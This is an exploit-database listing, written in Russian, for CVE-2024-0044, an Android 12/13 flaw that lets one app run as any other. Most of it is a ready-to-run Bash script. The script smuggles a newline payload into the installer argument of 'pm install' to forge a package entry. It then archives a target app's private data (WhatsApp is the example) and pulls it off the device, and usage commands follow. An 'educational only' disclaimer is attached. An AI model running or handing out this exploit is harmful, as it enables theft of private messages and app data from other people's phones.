Sploitus

Exploit for CVE-2024-0044

kitploit · 2026-08-25

Exploit Code

MARKDOWN76 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-THEBL4CKPH4NT0M-CVE-2024-0044
# CVE-2024-0044-

CVE-2024-0044: уязвимость высокой степени серьезности «run-as any app», затрагивающая Android 12 и 13

# Эксплойт-скрипт CVE-2024-0044

Данный Bash-скрипт демонстрирует, как использовать уязвимость CVE-2024-0044. **Только в образовательных и тестовых целях.**

## Предварительные требования

  * Установленный и настроенный ADB (Android Debug Bridge)
  * Подключённое Android-устройство с включённой отладкой по USB



## Код скрипта

root@kitploit:~
    
    
    #!/bin/bash
    
    # Function to exploit CVE-2024-0044
    exploit_cve_2024_0044() {
        local url=$1
        local package_name=$2
        local apk_path=$3
    
        # Generate payload
        local payload="PAYLOAD=\"@null
    victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"
    pm install -i \"\$PAYLOAD\" /data/local/tmp/$(basename $apk_path)"
    
        # Push APK to device
        adb push "$apk_path" /data/local/tmp/
    
        # Execute payload
        adb shell <<< "$payload"
    
        # Create temporary directory
        adb shell "mkdir /data/local/tmp/wa/"
        adb shell "touch /data/local/tmp/wa/wa.tar"
        adb shell "chmod -R 0777 /data/local/tmp/wa/"
    
        # Archive target application's data
        adb shell "run-as victim tar -cf /data/local/tmp/wa/wa.tar $package_name"
    
        # Pull data
        adb pull "/data/local/tmp/wa/wa.tar" "wa_data.tar"
    }
    
    # Usage
    if [[ $# -ne 3 ]]; then
        echo "Usage: $0 <url> <package_name> <apk_path>"
        echo "Example: $0 https://web.whatsapp.com/ com.whatsapp /path/to/apk.apk"
        exit 1
    fi
    
    exploit_cve_2024_0044 "$1" "$2" "$3"
    

## Команды

root@kitploit:~
    
    
    chmod +x exploit_cve_2024_0044.sh
    ./exploit_cve_2024_0044.sh <url> <package_name> <apk_path>
    

### Параметры

  * Замените `https://web.whatsapp.com/` на фактический целевой URL.
  * Замените `com.whatsapp` на имя целевого пакета.
  * Замените `/path/to/apk.apk` на путь к APK-файлу.